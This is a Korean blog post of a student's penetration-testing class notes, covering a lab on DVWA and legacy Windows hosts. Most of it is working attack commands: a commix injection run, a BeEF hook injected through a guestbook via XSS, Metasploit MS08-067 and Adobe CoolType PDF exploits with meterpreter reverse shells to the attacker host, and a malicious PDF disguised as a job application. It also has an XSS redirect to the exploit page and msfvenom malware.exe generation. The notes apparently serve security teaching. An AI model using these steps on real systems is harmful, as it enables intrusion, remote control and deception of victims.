본문 바로가기
정보보안

정보보안8 15차시

by IT매니절 2024. 12. 29.

dvma 웹해킹 실습

 

Command Injection

ip를 입력하게 되어 있지만, 다른 명령어도 실행되는 모습

 

칼리에서 진행

commix

웹 애플리케이션의 명령 주입 취약점을 자동으로 탐지하고 악용하기 위한 오픈소스 도구

 

# cat /usr/bin/commix
#!/usr/bin/env sh

set -e

cd /usr/share/commix/
exec python3 ./commix.py "$@"
=> commix의 내용. python3에 commix.py를 던져서 실행한다는 뜻

 

# commix --url="http://192.168.100.23:81/vulnerabilities/exec/" \
--data="ip=INJECT_HERE&Submit=Submit" \
--cookie="PHPSESSID=2ql16cgbpo4a0c06c81d4m1kf7; security=low"

=> 원래 쉘이 떨어져야 하는데 뭔가 문제가 있다는 듯 ... 

고친후에 재실습 예정

 

 

BeEF
Browser Exploitation Framework
XSS를 통해 브라우저를 공격하고 제어할 수 있는 클라이언트 사이드 공격을 수행하기 위한 도구

브라우저 후킹, 공격 모듈(키로깅, 스캔 등), 멀티플랫폼 지원

Polling 방식으로 브라우저를 후킹한다
브라우저(사용자)가 먼저 요청하도록 덫을 만들어 응답으로 사용자 브라우저에 공격을 실행한다

 

설치

sudo apt update
sudo apt install beef-xss

 

vi /usr/share/beef-xss/config.yaml

Metasploit과 연동하기 위해 metasploit을 enable설정

 

vi /usr/share/beef-xss/extensions/metasploit/config.yaml

enable, host, 좀 더 밑의 callback_host도 공격자 ip로 변경

 

Metasploit의 msgrpc 플러그인을 로드한다
Metasploit RPC 서버를 시작하고 Metasploit에 원격으로 접근하고 제어할 수 있도록 허용한다
(RPC 서버 : 원격으로 다른 컴퓨터의 프로그램 또는 프로세스가 특정 기능(Procedure)을 호출할 수 있도록 해주는 서버)

 

터미널을 하나 더 열어서 msfconsole 실행

명령어

search <keyword> : 키워드로 모듈 검색
use <module> : 모듈 선택
show options : 선택된 모듈에 필요한 옵션 표시
set <option> <value> : 모듈의 옵션 설정
exploit : 공격 실행
sessions : 활성 세션 표시
back : 현재 모듈에서 뒤로 이동
exit : 종료

 

msf6 > load msgrpc ServerHost=192.168.100.3 pass=abc123

=> Metasploit RPC 플러그인로드, RPC 서버에 바인딩될 ip 셋팅, RPC 서버 인증 비밀번호 셋팅

<script src="http://192.168.100.3:3000/hook.js"></script>

 

Sign Guestbook으로 등록하면

Online Browsers에 이렇게 100.23이 붙어있다

 

간단하게 alert dialog 공격을 하면

해당 브라우저에 alert가 뜬 것을 확인할 수 있다

그외

Browser : 후킹된 브라우저에 대한 정보 수집 모듈
Persistence : 후킹된 페이지를 벗어나도 또 다른 후킹 페이지로 연결하여 공격 시간을 연장시키는 모듈
Social Engineering : 사회공학적 기법을 이용한 모듈들

... 등등.

 

Metasploit 구성요소
익스플로잇, 페이로드, 리스너, 모듈, 데이터베이스 등등.

 

 

MS08-067 취약점
서버 서비스의 취약성으로 인해 원격 코드 실행을 허용할 수 있음(958644)
Microsoft Windows 2000, Windows XP 및 Windows Server 2003 시스템에서 공격자는 인증 없이 이 취약성을 악용하여 임의의 코드를 실행할 수 있다

 

공격할 호스트를 설정하고 아이피를 맞춰주었다

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
exploit

희생자쪽 CMD에서 netstat를 써보면 공격자 100.4와 연결된 것을 확인할 수 있다

공격자쪽에서 shell 명령어로 쉘을 획득한 후 ipconfig 써보면 희생자 ip인 100.4가 나온다

 

업로드 명령과 결과

다운로드 명령과 결과

 

 

Adobe Acrobat Reader(pdf) 취약점
Adobe Reader와 Acrobat의 CoolType.dll 모듈이 잘못된 SING 글꼴이 포함된 PDF문서를 처리하는 과정에서 오버플로우가 발생
원격코드가 실행되는 취약점

vi로 adobe_cooltype_sing.rc 를 만든뒤

use exploit/windows/fileformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.3
set LPORT 443
exploit

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.3
set LPORT 443
run

msfconsole -r adobe_cooltype_sing.rc

msfconsole을 이용하여 파일을 생성한다

 

다른터미널을 열어서 파일을 복사해놓는다

mv .msf4/local/msf.pdf /var/www/html/김초롱입사지원서.pdf
systemctl start apache2

 

희생자에서 이 url을 여는 순간 해킹된다

ps를 써서 explorer.exe 아이디를 찾고

migrate 1400으로 pid를 바꿔준다

정보를 조회해보면 희생자 os정보가 나온다

 

 

공격코드 2

use exploit/windows/browser/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_tcp
set URIPATH pdf.html
set LHOST 192.168.100.3
set LPORT 443
set SRVPORT 80 
run

 

피해자가 http://192.168.100.3/pdf.html 로 접속하면 해킹.

sessions를 보면 연결된 게 보인다

 

+

게시판에

<script>location.href="http://192.168.100.3/pdf.html";</script>

가 포함된 게시글을 작성하고, 희생자가 클릭하면 해킹된다.

리버스쉘로 연결되므로 방화벽으로 막을 수 없다

 

 

멀웨어malware.exe 제작하기
msfvenom -p windows/meterpreter/reverse_tcp \
lhost=192.168.100.3 lport=80 -f exe -o /var/www/html/malware.exe

 

/etc/init.d/apache2 stop

아파치 중단

malware.rc 공격코드

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost 192.168.100.3
set lport 80
exploit

msfconsole -r malware.rc  대기중

 

희생자가 http://192.168.100.3/malware.exe 에 접근하여 다운로드받았다고 가정하면 실행시 해킹된다

'정보보안' 카테고리의 다른 글

정보보안8 16차시  (0) 2025.01.04
정보보안8 14차시  (0) 2024.12.28
정보보안8 12-13차시  (0) 2024.12.22
정보보안8 11차시  (0) 2024.12.15
정보보안8 8차시  (0) 2024.12.01